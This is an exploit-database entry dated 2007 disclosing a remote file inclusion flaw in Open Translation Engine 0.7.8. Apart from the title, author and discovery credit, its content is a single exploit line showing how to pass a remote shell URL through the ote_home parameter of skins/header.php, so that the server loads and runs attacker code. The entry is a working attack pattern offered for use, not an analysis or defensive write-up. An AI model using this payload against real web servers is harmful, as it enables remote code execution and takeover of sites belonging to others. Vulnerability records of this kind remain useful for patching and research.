id: 1819
date: 05/02/2007
title: Open Translation Engine (OTE) 0.7.8 (header.php ote_home) RFI Vuln
author: GoLd_M
cves: 

==================================================================
Open Translation Engine (OTE) 0.7.8 (header.php ote_home) RFI Vuln
==================================================================



# Open Translation Engine (OTE) 0.7.8 (header.php ote_home)Remote File Include
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/skins/header.php?ote_home=Shell



#  0day.today [2023-03-25]  #